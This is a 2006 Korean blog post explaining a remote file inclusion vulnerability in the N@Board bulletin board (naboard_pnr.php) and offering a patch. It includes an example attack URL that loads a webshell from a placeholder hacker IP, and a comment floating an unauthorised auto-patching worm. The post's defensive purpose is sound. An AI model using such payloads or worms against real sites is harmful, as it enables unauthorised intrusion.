예를 들면
에 올라온 naboard/connect.php 나 bbs/connect.php 소스 파일 변조는 N@board 를 공략한 것으로 보입니다.
N@Board 취약점 공격이 최근 빈발하고 있는 사유는 얼마전 발표된 취약점 권고문을 살펴보면 알 수 있습니다. 문제는 naboard_pnr.php 소스의 48행, 49행에 있는 아래와 같은 코드에서 발생합니다.
$skin 이라는 변수가 초기화되지 않고 사용되기 때문에 skin 변수를 조작하여 해커가 원하는 임의의 명령어를 실행시킬 수 있습니다. 아마 공격자는 naboard_pnr.php?skin=http://[해커IP]/cmd.gif?cmd=blah blah 와 유사한 형태로 자동화된 웹쉘 공격을 수행했을 것입니다.
위의 소스가 낯익은 분들도 있을텐데, 제로보드의 스킨 취약점 소스와 유사하다는 것을 눈치챘을 것입니다. 몇몇 사례에서 볼 수 있듯이 다양한 Skin 을 지원하는 게시판은 주의깊게 프로그래밍하지 않으면 원격 include 취약점을 공통적으로 갖게 됩니다.
현재 N@Board 개발 회사 사이트(http://navyism.com/)에는 아쉽게도 패치 버전이 안올라와 있습니다. 하긴 개발 회사 홈페이지에서 배포하는 최신 버전이 2002년 3월 25일자 버전이니, 그 후로 개발이 안되고 있을런지도 모르겠네요. Secunia 에 올라온 자료로는 권고문을 발표한 해커들이 개발 회사에 사전 통보했는지 여부에 대해 알 수 없는 상황.
위의 취약점에 대한 패치는 제로보드 스킨 취약점 때와 동일하게 대처하면 됩니다.
48 행 에 if(eregi(":\/\/",$skin) || eregi("\.\.",$skin)) $skin=""; 를 추가하고
49 행 include "$skin/pnr_top.php"; 를 사용하면 됩니다.
패치를 적용하면 다음과 같은 코드가 됩니다.
혹시 N@Board 를 사용하시는 분들은 신속히 조치하여 피해를 예방하시기 바랍니다.
---
추가
한국 구글에서 검색해보면 최소 74,500 개의 페이지가 이 보드를 사용 중이네요. 걱정스럽습니다.
덧글
이경민 2006/10/27 23:02 # 삭제 답글
잘보고 갑니다. ~!!알기 쉽게 잘 적어 주셔서 감사합니다.
fullc0de 2006/10/30 17:34 # 삭제 답글
헐... 74,500개의 압박이 심한데요 ^^
헐랭이 2006/11/01 19:47 # 답글
법에 저촉되지 않는다면, 간단한 worm 을 만들어서 취약한 웹 페이지를 전부 자동 패치할 수도 있겠죠. 74,500 개의 페이지라고 해도 하루 정도면 될 텐데... 위법성 여부에 대해 확신이 안서네요.
newsky 2006/11/12 15:10 # 삭제 답글
들어가는 것만으로도 법에 걸릴듯하네요~그게 가능하다면..
문데되는 여러 어플리케이션 다 자동 패치해버리면 최소한 마구잡이로 올라오는 것들을 막을 수 있을텐데 싶네요.
elca 2006/11/22 01:06 # 삭제 답글
^^ 잘계시죠? 좋은밤되시구요..글 엎어갔는데..트랙백이 안가는군요..-_-
http://www.elca2.com/blog/entry/소잃고-외양간-고친다
헐랭이 2006/11/23 00:57 # 답글
네, 저는 그럭저럭 잘 지내고 있습니다. 귀찮은 일을 당하셨던데 모쪼록 복구 잘되셨길 바랍니다.